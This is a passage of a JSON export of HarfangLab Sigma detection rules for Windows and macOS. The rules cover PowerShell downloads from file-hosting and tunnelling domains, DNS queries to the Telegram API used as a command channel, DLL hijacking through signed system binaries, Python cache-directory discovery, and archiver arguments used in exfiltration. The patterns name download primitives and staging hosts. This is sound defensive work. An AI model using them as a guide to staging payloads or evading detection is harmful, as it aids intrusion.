'LwBkAGEAZgB0AGgAYQBjAGsALw'\n - '8AZABhAGYAdABoAGEAYwBrAC8A'\n - 'vAGQAYQBmAHQAaABhAGMAawAvA'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d242d0d4-fb07-43c1-8f33-f08f9c952b6f",
"rule_name": "URLs of Malicious Code Repository in PowerShell Command-line",
"rule_description": "Detects PowerShell command lines containing a URL that references repositories used to host malicious code or offensive tooling.\nThreat actors frequently use public repositories and open-source PowerShell scripts in their attacks.\nIt is recommended to investigate the repository being accessed and examine any files or data that may have been downloaded. If your organization is not undergoing a security audit, this could indicate the initial stages of an attack.\n",
"rule_creation_date": "2020-12-08",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d25b1a3a-9bf4-4d10-95eb-66d52cf64863",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625374Z",
"creation_date": "2026-03-23T11:45:34.625376Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625380Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.ncsc.gov.uk/files/NCSC-Malware-Analysis-Report-Small-Sieve.pdf",
"https://www.cloudsek.com/blog/breaking-into-the-bandit-stealer-malware-infrastructure",
"https://attack.mitre.org/techniques/T1102/002/",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1102_002_dns_resolution_telegram_api.yml",
"content": "title: DNS Resolution of Telegram API\nid: d25b1a3a-9bf4-4d10-95eb-66d52cf64863\ndescription: |\n Detects a DNS resolution request to the Telegram API.\n Adversaries may use an existing, legitimate external Web service like Telegram as a mean to sending commands to and receiving output from a compromised system over the Web service channel.\n It is recommended to investigate the process at the origin of the DNS resolution to determine whether he can legitimately communicate with Telegram API.\nreferences:\n - https://www.ncsc.gov.uk/files/NCSC-Malware-Analysis-Report-Small-Sieve.pdf\n - https://www.cloudsek.com/blog/breaking-into-the-bandit-stealer-malware-infrastructure\n - https://attack.mitre.org/techniques/T1102/002/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2023/10/04\nmodified: 2025/12/19\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1102.002\n - attack.t1071.001\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Behavior.NetworkActivity\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: dns_query\ndetection:\n selection:\n QueryName: 'api.telegram.org'\n\n filter_browser:\n ProcessOriginalFileName:\n - 'firefox.exe'\n - 'chrome.exe'\n - 'brave.exe'\n - 'msedge.exe'\n - 'librewolf.exe'\n - 'opera.exe'\n - 'vivaldi.exe'\n - 'iexplore.exe'\n - 'msedgewebview2.exe'\n - 'zen.exe'\n\n filter_telegram:\n ProcessSigned: 'true'\n ProcessSignature: 'Telegram FZ-LLC'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessSigned: 'true'\n\n exclusion_misc_windows:\n ProcessImage:\n - '?:\\Windows\\System32\\PING.EXE'\n - '?:\\Windows\\SysWOW64\\PING.EXE'\n - '?:\\Windows\\System32\\ipconfig.exe'\n - '?:\\Windows\\SysWOW64\\ipconfig.exe'\n - '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n - '?:\\Windows\\System32\\wbem\\WmiApSrv.exe'\n - 
'?:\\Windows\\System32\\smartscreen.exe'\n\n exclusion_svchost:\n ProcessImage: '?:\\Windows\\System32\\svchost.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_xtensive_messenger:\n ProcessImage: '?:\\Program Files\\X-tensive\\Messenger\\DPA.Messenger.exe'\n\n exclusion_defender:\n ProcessOriginalFileName:\n - 'MsMpEng.exe'\n - 'MsSense.exe'\n - 'NisSrv.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_trellix:\n # C:\\Program Files\\McAfee\\Endpoint Security\\Adaptive Threat Protection\\mfeatp.exe\n ProcessDescription:\n - 'Trellix Adaptive Threat Protection Service'\n - 'McAfee Adaptive Threat Protection Service'\n ProcessSigned: 'true'\n ProcessSignature: 'MUSARUBRA US LLC'\n\n exclusion_postman:\n ProcessImage|endswith: '\\Postman.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Postman, Inc.'\n\n exclusion_cisco:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\CiscoSparkLauncher\\CiscoCollabHost.exe'\n\n exclusion_jetbrains:\n ProcessParentImage: '?:\\Program Files\\JetBrains\\PyCharm ????.*\\bin\\pycharm64.exe'\n\n exclusion_visualstudio:\n ProcessParentImage: '?:\\Program Files\\Microsoft Visual Studio\\\\??\\Professional\\Common7\\IDE\\CommonExtensions\\Platform\\Debugger\\VsDebugConsole.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d25b1a3a-9bf4-4d10-95eb-66d52cf64863",
"rule_name": "DNS Resolution of Telegram API",
"rule_description": "Detects a DNS resolution request to the Telegram API.\nAdversaries may use an existing, legitimate external Web service such as Telegram as a means of sending commands to and receiving output from a compromised system over the Web service channel.\nIt is recommended to investigate the process at the origin of the DNS resolution to determine whether it can legitimately communicate with the Telegram API.\n",
"rule_creation_date": "2023-10-04",
"rule_modified_date": "2025-12-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.001",
"attack.t1102.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d25d4f23-01a8-491f-9a6d-40fa4c24a691",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094260Z",
"creation_date": "2026-03-23T11:45:34.094262Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094266Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_devicecensus.yml",
"content": "title: DLL Hijacking via devicecensus.exe\nid: d25d4f23-01a8-491f-9a6d-40fa4c24a691\ndescription: |\n Detects potential Windows DLL Hijacking via devicecensus.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'devicecensus.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dcntel.dll'\n - '\\fastprox.dll'\n - '\\flightsettings.dll'\n - '\\idstore.dll'\n - '\\IPHLPAPI.DLL'\n - '\\logoncli.dll'\n - '\\mmdevapi.dll'\n - '\\mswsock.dll'\n - '\\netutils.dll'\n - '\\npmproxy.dll'\n - '\\sapi_onecore.dll'\n - '\\wbemprox.dll'\n - '\\wbemsvc.dll'\n - '\\WINHTTP.dll'\n - '\\wlidprov.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - 
'?:\\Windows\\WinSxS\\'\n - '?:\\ProgramData\\docker\\windowsfilter\\\\*\\Files\\Windows\\System32\\wbem\\'\n - '*\\docker\\windowsfilter\\\\*\\Files\\Windows\\System32\\'\n - '*\\docker\\windowsfilter\\\\*\\Files\\Windows\\Syswow64\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d25d4f23-01a8-491f-9a6d-40fa4c24a691",
"rule_name": "DLL Hijacking via devicecensus.exe",
"rule_description": "Detects potential Windows DLL Hijacking via devicecensus.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate, Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d2bc2fc3-bad0-46d1-8ded-549c64f89716",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603296Z",
"creation_date": "2026-03-23T11:45:34.603299Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603308Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://securityboulevard.com/2021/02/discord-cdn-a-popular-choice-for-hosting-malicious-payloads/",
"https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/november/APT29%20attacks%20Embassies%20using%20CVE-2023-38831%20-%20report%20en.pdf",
"https://attack.mitre.org/techniques/T1102/003/"
],
"name": "t1102_003_powershell_suspicious_download.yml",
"content": "title: Suspicious File Download via PowerShell\nid: d2bc2fc3-bad0-46d1-8ded-549c64f89716\ndescription: |\n Detects Web requests made by PowerShell to suspicious domains.\n These are usually existing, legitimate external Web services that allow users to host content.\n Popular websites and social media may give cover to adversaries, due to hosts communicating to these domains before being compromised.\n Adversaries can use these domains to send commands or upload payloads to a compromised system.\n It is recommended to investigate the PowerShell command and the parent process for suspicious activities.\nreferences:\n - https://securityboulevard.com/2021/02/discord-cdn-a-popular-choice-for-hosting-malicious-payloads/\n - https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/november/APT29%20attacks%20Embassies%20using%20CVE-2023-38831%20-%20report%20en.pdf\n - https://attack.mitre.org/techniques/T1102/003/\ndate: 2023/01/16\nmodified: 2025/04/02\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1102.003\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.FileDownload\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_command:\n PowershellCommand|contains:\n - 'DownloadFile'\n - 'DownloadData'\n - 'DownloadString'\n - 'DeflateStream'\n - 'FromBase64String'\n - 'Invoke-WebRequest'\n - ' iwr '\n - ' iwr('\n - ' iwr;'\n - ' iwr\"'\n - ' iwr'''\n - '(iwr '\n - '(iwr('\n - '(iwr;'\n - '(iwr\"'\n - '(iwr'''\n - ';iwr '\n - ';iwr('\n - ';iwr;'\n - ';iwr\"'\n - ';iwr'''\n - '\"iwr '\n - '\"iwr('\n - '\"iwr;'\n - '\"iwr\"'\n - '\"iwr'''\n - '''iwr '\n - '''iwr('\n - '''iwr;'\n - '''iwr\"'\n - '''iwr'''\n\n selection_link:\n PowershellCommand|contains:\n - 'cdn.discordapp.com'\n - 'pastebin.com/raw'\n - 'paste.ee'\n - 'api.telegram.org'\n - 'www.dropbox.com'\n - 'api.dropboxapi.com'\n - 
'content.dropboxapi.com'\n - 'transfer.sh/'\n - 'anonfiles.com'\n - 'gofile.io'\n - 'file.io'\n - 'paste.c-net.org'\n - 'ngrok-free.app/'\n - 'ngrok-free.dev/'\n - 'ngrok.app/'\n - 'ngrok.dev/'\n - 'ngrok.io/'\n\n exclusion_nable:\n ProcessParentImage:\n - '?:\\Program Files (x86)\\N-able Technologies\\Windows Agent\\bin\\agent.exe'\n - '?:\\Program Files\\N-able Technologies\\Windows Agent\\bin\\agent.exe'\n - '?:\\Program Files (x86)\\N-able Technologies\\AutomationManagerAgent\\AutomationManager.AgentService.exe'\n - '?:\\Program Files\\N-able Technologies\\AutomationManagerAgent\\AutomationManager.AgentService.exe'\n\n # https://www.powershellgallery.com/packages/dbatools/1.0.135/Content/allcommands.ps1\n exclusion_dbatools:\n PowershellCommand|contains|all:\n - '#.ExternalHelp dbatools-Help.xml'\n - 'function Add-DbaAgDatabase {'\n - 'function Add-DbaAgListener {'\n - 'function Save-DbaDiagnosticQueryScript {'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d2bc2fc3-bad0-46d1-8ded-549c64f89716",
"rule_name": "Suspicious File Download via PowerShell",
"rule_description": "Detects Web requests made by PowerShell to suspicious domains.\nThese are usually existing, legitimate external Web services that allow users to host content.\nPopular websites and social media may give cover to adversaries, because hosts were already communicating with these domains before being compromised.\nAdversaries can use these domains to send commands or upload payloads to a compromised system.\nThe rule only fires when a download or decoding primitive (e.g. DownloadString, Invoke-WebRequest, FromBase64String) and one of the listed hosting domains appear in the same PowerShell command, so the domain alone is not evidence of compromise.\nIt is recommended to investigate the full PowerShell command and the parent process for suspicious activities.\n",
"rule_creation_date": "2023-01-16",
"rule_modified_date": "2025-04-02",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1102.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d2dec7ca-1e0f-4830-bdb7-913fefbd8a13",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098222Z",
"creation_date": "2026-03-23T11:45:34.098224Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098228Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_microsoft_uev_cscunpintool.yml",
"content": "title: DLL Hijacking via microsoft.uev.cscunpintool.exe\nid: d2dec7ca-1e0f-4830-bdb7-913fefbd8a13\ndescription: |\n Detects potential Windows DLL Hijacking via microsoft.uev.cscunpintool.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'microsoft.uev.cscunpintool.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\CSCAPI.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d2dec7ca-1e0f-4830-bdb7-913fefbd8a13",
"rule_name": "DLL Hijacking via microsoft.uev.cscunpintool.exe",
"rule_description": "Detects potential Windows DLL hijacking via microsoft.uev.cscunpintool.exe.\nDLL hijacking takes advantage of the default Windows search order by placing a malicious DLL alongside the victim application.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nThe rule alerts when this binary loads CSCAPI.dll from outside System32, SysWOW64 or WinSxS and the library is not signed by Microsoft Windows; executions of the binary itself from those system directories are also filtered out.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d2e34f8d-c34b-4149-94f4-502c3fecc3e3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628509Z",
"creation_date": "2026-03-23T11:45:34.628511Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628515Z",
"rule_level": "low",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/",
"https://opensource.apple.com/source/Libc/Libc-583/include/unistd.h.auto.html",
"https://www.manpagez.com/man/3/confstr/",
"https://attack.mitre.org/techniques/T1083/"
],
"name": "t1083_python_confstr_user_cache_dir.yml",
"content": "title: User Cache Directory Discovered via Python\nid: d2e34f8d-c34b-4149-94f4-502c3fecc3e3\ndescription: |\n Detects the discovery of the user cache directory via the python3 os.confstr function.\n Attackers may use it during the discovery phase of an attack to retrieve the user cache directory.\n It is recommended to check for other suspicious activity by the process or its parents and to correlate this alert with any other discovery activity to determine legitimacy.\n If this activity is recurrent in your environment and legitimate, it is highly recommended to whitelist it.\n\nreferences:\n - https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/\n - https://opensource.apple.com/source/Libc/Libc-583/include/unistd.h.auto.html\n - https://www.manpagez.com/man/3/confstr/\n - https://attack.mitre.org/techniques/T1083/\ndate: 2022/12/08\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1083\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Script.Python\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image:\n - '/usr/bin/python'\n - '/usr/bin/python2'\n - '/usr/bin/python3'\n # _CS_DARWIN_USER_CACHE_DIR\n CommandLine|contains|all:\n - '-c'\n - 'os.confstr(65538)'\n ParentImage|contains: '?'\n\n condition: selection\nlevel: low\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d2e34f8d-c34b-4149-94f4-502c3fecc3e3",
"rule_name": "User Cache Directory Discovered via Python",
"rule_description": "Detects the discovery of the user cache directory via the Python os.confstr function, called with the _CS_DARWIN_USER_CACHE_DIR constant (65538).\nAttackers may use it during the discovery phase of an attack to retrieve the user cache directory.\nOnly the literal form os.confstr(65538) passed inline with -c to /usr/bin/python, python2 or python3 is matched; the same query written with the named constant, with different spacing, through another interpreter path or from a script file is generally not covered.\nIt is recommended to check for other suspicious activity by the process or its parents and to correlate this alert with any other discovery activity to determine legitimacy.\nIf this activity is recurrent in your environment and legitimate, it is highly recommended to whitelist it.\n",
"rule_creation_date": "2022-12-08",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1083"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d2eb031e-a992-4f43-8940-718b51c05cb9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606475Z",
"creation_date": "2026-03-23T11:45:34.606478Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606486Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_gb/research/24/i/earth-preta-new-malware-and-strategies.html",
"https://attack.mitre.org/techniques/T1560/001/"
],
"name": "archiver_tool_suspicious_parameters.yml",
"content": "title: Archiver Tool Execution with Suspicious Arguments\nid: d2eb031e-a992-4f43-8940-718b51c05cb9\ndescription: |\n Detects when a common archiver tool, such as 7Zip or WinRAR, is used with suspicious arguments, such as wiping files after archiving or using encryption.\n These parameters have been used by threat actors for exfiltrating and deleting data.\n It is recommended to investigate this behavior to determine if this archiver is not being used on sensitive data.\nreferences:\n - https://www.trendmicro.com/en_gb/research/24/i/earth-preta-new-malware-and-strategies.html\n - https://attack.mitre.org/techniques/T1560/001/\ndate: 2020/12/15\nmodified: 2025/10/27\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1560\n - attack.t1560.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Collection\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_application_winrar:\n - Image: '*\\rar.exe'\n - Description: 'Command line RAR'\n selection_application_7z:\n - Image:\n - '*\\7z.exe'\n - '*\\7za.exe'\n - OriginalFileName:\n - '7z.exe'\n - '7za.exe'\n selection_parameters:\n CommandLine:\n - '* -dw*' # rar : wipe files after archiving\n - '* -hp*' # rar : encrypt headers, filename, and data\n - '* -p*' # rar/7z : encrypt data\n - '* -sdel*' # 7z: delete files after compression\n - '* -ta*' # rar : process files modified after\n - '* -tb*' # rar : process files modified before\n\n exclusion_archive_type:\n CommandLine: '* -tbzip*' # 7z: can collide with -tb from rar\n\n exclusion_image:\n ParentImage:\n - '?:\\Program Files (x86)\\CERIG\\Sauvegarde CERIG .NET\\Sauvegarde_Cerig_Net.exe'\n - '?:\\Program Files (x86)\\Becton Dickinson\\EpiPreUpgrade\\EpiPreUpgrade.exe'\n - '?:\\Program Files (x86)\\MicroScan\\Connect\\LPSecurityGuard.exe'\n - '?:\\Program Files (x86)\\MicroScan\\Connect\\DMSWABarcodes.exe'\n - '?:\\Program Files 
(x86)\\MicroScan\\Connect\\WAMonitor.exe'\n - '?:\\Program Files (x86)\\MicroScan\\Connect\\DMSDataEntry.exe'\n - '?:\\Program Files\\Qognify\\VMS\\tools\\Setup\\VMS_CORE.exe'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\dcconfig.exe'\n - '?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\bin\\dcagentservice.exe'\n - '?:\\Program Files (x86)\\DesktopCentral_Agent\\bin\\dcagentservice.exe'\n - '?:\\Windows\\System32\\dgagent\\dsagent.exe'\n - '?:\\Program Files\\IDEA StatiCa\\StatiCa *\\IdeaConnection.exe'\n - '?:\\Program Files\\IDEA StatiCa\\StatiCa *\\IdeaCheckbot.exe'\n - '?:\\Program Files (x86)\\BigFix Enterprise\\BES Client\\BESClient.exe'\n\n exclusion_peazip1:\n Image:\n - '?:\\program files\\peazip\\res\\7z\\7z.exe'\n - '?:\\program files (x86)\\peazip\\res\\7z\\7z.exe'\n CommandLine|contains: ' -pdefault '\n exclusion_peazip2:\n Image:\n - '?:\\Program Files\\PeaZip\\res\\bin\\7z\\7z.exe'\n - '?:\\Program Files\\PeaZip\\res\\7z\\7z.exe'\n ParentImage: '?:\\Program Files\\PeaZip\\peazip.exe'\n GrandparentImage:\n - '?:\\Program Files\\PeaZip\\peazip.exe'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'\n - '?:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n - '?:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE'\n - '?:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n\n exclusion_trendmicro:\n Image:\n - '?:\\Program Files (x86)\\Trend 